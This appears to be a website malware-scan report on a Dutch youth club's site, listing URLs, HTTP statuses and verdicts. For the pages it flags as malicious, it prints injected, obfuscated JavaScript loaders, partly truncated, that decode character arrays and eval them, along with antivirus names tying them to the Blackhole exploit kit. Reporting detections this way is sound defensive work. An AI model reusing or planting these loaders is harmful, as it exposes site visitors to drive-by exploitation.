Request | Server response | Status |
http://www.jeugdsoosdownunder.nl/ | 200 OK Content-Length: 19862 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["cr"+"eateElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["1e","3o","4d","46","3l","4c","41","47","46","16","1e","1f","16","4j","d","a","16","16","16","16","4e","3j","4a","16","3o","4b","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o"
... 1624 bytes are skipped ..."4e","2a","1d","1f","27","d","a","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3o","4b","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","4b","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-459!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/Agent.axqoua
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Clicker.ADU
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- McAfee-GW-Edition
- JS/Blacole-Redirect.y
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Clicker.ADU
- Fortinet
- JS/Crypt.BBEO!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Blacole-Redirect.y
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Clicker.ADU
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/Blacole.DB.gen
- AVG
- HTML/Framer
- Norman
- Clicker.OJ
- GData
- Trojan.JS.Clicker.ADU
- Commtouch
- JS/Blacole.DB.gen
- BitDefender
- Trojan.JS.Clicker.ADU
|
http://www.jeugdsoosdownunder.nl/incs/home.js | 200 OK Content-Length: 3364 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["cr"+"eateElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["1e","3o","4d","46","3l","4c","41","47","46","16","1e","1f","16","4j","d","a","16","16","16","16","4e","3j","4a","16","4f","42","46","3j","3p","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e"
... 1804 bytes are skipped ...a","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","4f","42","46","3j","3p","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","4f","42","46","3j","3p","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-495!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/Agent.axqoua
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Clicker.ADU
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- McAfee-GW-Edition
- JS/Blacole-Redirect.y
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Clicker.ADU
- Fortinet
- JS/Crypt.BBEO!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Blacole-Redirect.y
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Clicker.ADU
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/Blacole.DB.gen
- AVG
- HTML/Framer
- Norman
- Clicker.OJ
- GData
- Trojan.JS.Clicker.ADU
- Commtouch
- JS/Blacole.DB.gen
- BitDefender
- Trojan.JS.Clicker.ADU
|
http://www.jeugdsoosdownunder.nl/images/rotate/rotate.js | 200 OK Content-Length: 14277 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=124;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,93,107,105,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,23,24,25,26,93,107,105,39,109,109,90,24,54,26,
... 864 bytes are skipped ...34,26,118,4,2,25,26,27,23,24,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,90,109,107,87,30,24,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,91,110,108,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,89,108,106,35,54,4,2,25,26,27,23,117,6,4,120,32,32,34,53);s="";for(i=0;i-469!=0;i++){if(020==0x10)s+=String.fromCharCode(1*asgq[i]-(i%5-9));}z=s;e(z);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.79
- Avast
- JS:Decode-ML [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Crypt.KK
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.369
- Kaspersky
- Exploit.JS.Agent.bmh
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.Crypt.KK
- Fortinet
- JS/Agent.BMH!exploit
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.Crypt.KK
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BKSD
- GData
- JS:Trojan.Crypt.KK
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Crypt.KK
|
http://www.jeugdsoosdownunder.nl/home.html | 404 Not Found Content-Length: 967 Content-Type: text/html | clean |
http://www.jeugdsoosdownunder.nl/test404page.js | 404 Not Found Content-Length: 967 Content-Type: text/html | clean |
http://www.jeugdsoosdownunder.nl/soosinfo.html | 404 Not Found Content-Length: 967 Content-Type: text/html | clean |
http://www.jeugdsoosdownunder.nl/agenda.html | 404 Not Found Content-Length: 967 Content-Type: text/html | clean |
http://www.jeugdsoosdownunder.nl/fotos.html | 404 Not Found Content-Length: 967 Content-Type: text/html | clean |
http://www.jeugdsoosdownunder.nl/gastenboek.html | 404 Not Found Content-Length: 967 Content-Type: text/html | clean |
http://www.jeugdsoosdownunder.nl/contact.html | 404 Not Found Content-Length: 967 Content-Type: text/html | clean |
http://www.jeugdsoosdownunder.nl/links.html | 404 Not Found Content-Length: 967 Content-Type: text/html | clean |
http://www.jeugdsoosdownunder.nl/nieuws/50/Marathon_zeer_geslaagd_.html | 200 OK Content-Length: 19862 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["cr"+"eateElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["1e","3o","4d","46","3l","4c","41","47","46","16","1e","1f","16","4j","d","a","16","16","16","16","4e","3j","4a","16","3o","4b","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o"
... 1624 bytes are skipped ..."4e","2a","1d","1f","27","d","a","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3o","4b","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","4b","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-459!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/Agent.axqoua
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Clicker.ADU
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- McAfee-GW-Edition
- JS/Blacole-Redirect.y
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Clicker.ADU
- Fortinet
- JS/Crypt.BBEO!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Blacole-Redirect.y
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Clicker.ADU
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/Blacole.DB.gen
- AVG
- HTML/Framer
- Norman
- Clicker.OJ
- GData
- Trojan.JS.Clicker.ADU
- Commtouch
- JS/Blacole.DB.gen
- BitDefender
- Trojan.JS.Clicker.ADU
|
http://www.jeugdsoosdownunder.nl/nieuws/42/Facebook.html | 200 OK Content-Length: 19862 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["cr"+"eateElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["1e","3o","4d","46","3l","4c","41","47","46","16","1e","1f","16","4j","d","a","16","16","16","16","4e","3j","4a","16","3o","4b","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o"
... 1624 bytes are skipped ..."4e","2a","1d","1f","27","d","a","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3o","4b","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","4b","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-459!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/Agent.axqoua
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Clicker.ADU
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- McAfee-GW-Edition
- JS/Blacole-Redirect.y
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Clicker.ADU
- Fortinet
- JS/Crypt.BBEO!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Blacole-Redirect.y
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Clicker.ADU
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/Blacole.DB.gen
- AVG
- HTML/Framer
- Norman
- Clicker.OJ
- GData
- Trojan.JS.Clicker.ADU
- Commtouch
- JS/Blacole.DB.gen
- BitDefender
- Trojan.JS.Clicker.ADU
|
http://www.jeugdsoosdownunder.nl/nieuws/20/Welkom.html | 200 OK Content-Length: 19862 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["cr"+"eateElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["1e","3o","4d","46","3l","4c","41","47","46","16","1e","1f","16","4j","d","a","16","16","16","16","4e","3j","4a","16","3o","4b","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o"
... 1624 bytes are skipped ..."4e","2a","1d","1f","27","d","a","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3o","4b","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","4b","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-459!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/Agent.axqoua
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Clicker.ADU
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- McAfee-GW-Edition
- JS/Blacole-Redirect.y
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Clicker.ADU
- Fortinet
- JS/Crypt.BBEO!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Blacole-Redirect.y
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Clicker.ADU
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/Blacole.DB.gen
- AVG
- HTML/Framer
- Norman
- Clicker.OJ
- GData
- Trojan.JS.Clicker.ADU
- Commtouch
- JS/Blacole.DB.gen
- BitDefender
- Trojan.JS.Clicker.ADU
|
http://www.jeugdsoosdownunder.nl/fotos/album/81/24_uurs_marathon_voor_3FM_Serious_Request.html | 200 OK Content-Length: 36306 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["cr"+"eateElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["1e","3o","4d","46","3l","4c","41","47","46","16","1e","1f","16","4j","d","a","16","16","16","16","4e","3j","4a","16","3o","4b","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o"
... 1624 bytes are skipped ..."4e","2a","1d","1f","27","d","a","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3o","4b","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","4b","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-459!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/Agent.axqoua
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Clicker.ADU
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- McAfee-GW-Edition
- JS/Blacole-Redirect.y
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Clicker.ADU
- Fortinet
- JS/Crypt.BBEO!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Blacole-Redirect.y
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Clicker.ADU
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/Blacole.DB.gen
- AVG
- HTML/Framer
- Norman
- Clicker.OJ
- GData
- Trojan.JS.Clicker.ADU
- Commtouch
- JS/Blacole.DB.gen
- BitDefender
- Trojan.JS.Clicker.ADU
|